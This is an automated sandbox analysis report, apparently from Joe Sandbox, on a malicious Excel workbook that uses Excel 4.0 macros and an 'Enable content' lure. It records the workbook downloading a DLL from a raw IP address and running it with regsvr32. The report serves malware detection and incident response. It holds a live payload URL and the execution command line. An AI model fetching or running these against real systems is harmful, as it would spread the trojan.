Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://settings.outlook.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://tasks.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable editing " to unlock the editing document downloaded from the Internet. . , " El 14 Protecte
Source: Screenshot number: 4	Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start ' ,, , , 18 the decryption of

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: Order_Summary-9632850.xlsb	Initial sample: CALL
Source: Order_Summary-9632850.xlsb	Initial sample: CALL
Source: Order_Summary-9632850.xlsb	Initial sample: EXEC

Office process drops PE file

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\kdldyeff.dll			Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe

Process Stats: CPU usage > 98%

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll 337A487F1CB8F16200A5D14CAC1DAC3478E95CF3077B3872D319970131BEA702
Source: Joe Sandbox View	Dropped File: C:\Users\user\kdldyeff.dll 337A487F1CB8F16200A5D14CAC1DAC3478E95CF3077B3872D319970131BEA702

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Source: classification engine

Classification label: mal88.expl.evad.winXLSB@5/10@0/1

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{9D11D15E-C66E-40D8-82BE-500D324727B3} - OProcSessId.dat

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Order_Summary-9632850.xlsb	Initial sample: OLE zip file path = xl/media/image1.png
Source: Order_Summary-9632850.xlsb	Initial sample: OLE zip file path = xl/media/image2.png
Source: Order_Summary-9632850.xlsb	Initial sample: OLE zip file path = xl/media/image3.png
Source: Order_Summary-9632850.xlsb	Initial sample: OLE zip file path = xl/media/image4.png
Source: Order_Summary-9632850.xlsb	Initial sample: OLE zip file path = xl/media/image5.png

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_029A1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,

3_2_029A1030

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_04602AF0 push dword ptr [edx+14h]; ret

3_2_04602BFD

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\kdldyeff.dll			Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\kdldyeff.dll

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\kdldyeff.dll

Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll

Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_029A1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,

3_2_029A1030

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_029A1030 mov eax, dword ptr fs:[00000030h]	3_2_029A1030
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_048E095E mov eax, dword ptr fs:[00000030h]	3_2_048E095E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_048E0456 mov eax, dword ptr fs:[00000030h]	3_2_048E0456

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_029A1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,

3_2_029A1030

Source: C:\Windows\SysWOW64\regsvr32.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe

Jump to behavior

Source: Yara match

File source: app.xml, type: SAMPLE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting1	DLL Side-Loading1	Process Injection11	Masquerading111	OS Credential Dumping	Security Software Discovery1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Ingress Tool Transfer11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	DLL Side-Loading1	Disable or Modify Tools1	LSASS Memory	File and Directory Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution42	Logon Script (Windows)	Logon Script (Windows)	Process Injection11	Security Account Manager	System Information Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol21	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Scripting1	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Regsvr321	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	DLL Side-Loading1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Order_Summary-9632850.xlsb	2%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll	4%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\kdldyeff.dll	4%	ReversingLabs	Win32.Trojan.Generic

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
3.2.regsvr32.exe.2c00000.2.unpack	100%	Avira	TR/Dropper.Gen		Download File
3.2.regsvr32.exe.4590000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://ofcrecsvcapi-int.azurewebsites.net/	0%	Avira URL Cloud	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	Avira URL Cloud	safe
http://185.180.199.121/sat1_0609_2.dll	0%	Avira URL Cloud	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://ncus.contentsync.	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
https://wus2.contentsync.	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
https://asgsmsproxyapi.azurewebsites.net/	0%	Avira URL Cloud	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://ncus.pagecontentsync.	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.180.199.121/sat1_0609_2.dll	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.diagnosticssdf.office.com	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://login.microsoftonline.com/	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://shell.suite.office.com:1443	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://autodiscover-s.outlook.com/	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://cdn.entity.	B709A3E3-2143-4926-A150-50001F594891.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.addins.omex.office.net/appinfo/query	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://clients.config.office.net/user/v1.0/tenantassociationkey	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://powerlift.acompli.net	B709A3E3-2143-4926-A150-50001F594891.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	B709A3E3-2143-4926-A150-50001F594891.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://cortana.ai	B709A3E3-2143-4926-A150-50001F594891.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://cloudfiles.onenote.com/upload.aspx	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://entitlement.diagnosticssdf.office.com	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://api.aadrm.com/	B709A3E3-2143-4926-A150-50001F594891.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ofcrecsvcapi-int.azurewebsites.net/	B709A3E3-2143-4926-A150-50001F594891.0.dr	false	Avira URL Cloud: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://api.microsoftstream.com/api/	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://cr.office.com	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://portal.office.com/account/?ref=ClientMeControl	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://ecs.office.com/config/v2/Office	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://graph.ppe.windows.net	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	B709A3E3-2143-4926-A150-50001F594891.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://powerlift-frontdesk.acompli.net	B709A3E3-2143-4926-A150-50001F594891.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://tasks.office.com	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://officeci.azurewebsites.net/api/	B709A3E3-2143-4926-A150-50001F594891.0.dr	false	Avira URL Cloud: safe	unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://store.office.cn/addinstemplate	B709A3E3-2143-4926-A150-50001F594891.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://globaldisco.crm.dynamics.com	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://store.officeppe.com/addinstemplate	B709A3E3-2143-4926-A150-50001F594891.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev0-api.acompli.net/autodetect	B709A3E3-2143-4926-A150-50001F594891.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.odwebp.svc.ms	B709A3E3-2143-4926-A150-50001F594891.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	sat1_0609_2[1].dll.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.powerbi.com/v1.0/myorg/groups	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://web.microsoftstream.com/video/	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://graph.windows.net	B709A3E3-2143-4926-A150-50001F594891.0.dr	false		high
https://dataservice.o365filtering.com/	B709A3E3-2143-4926-A150-50001F594891.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
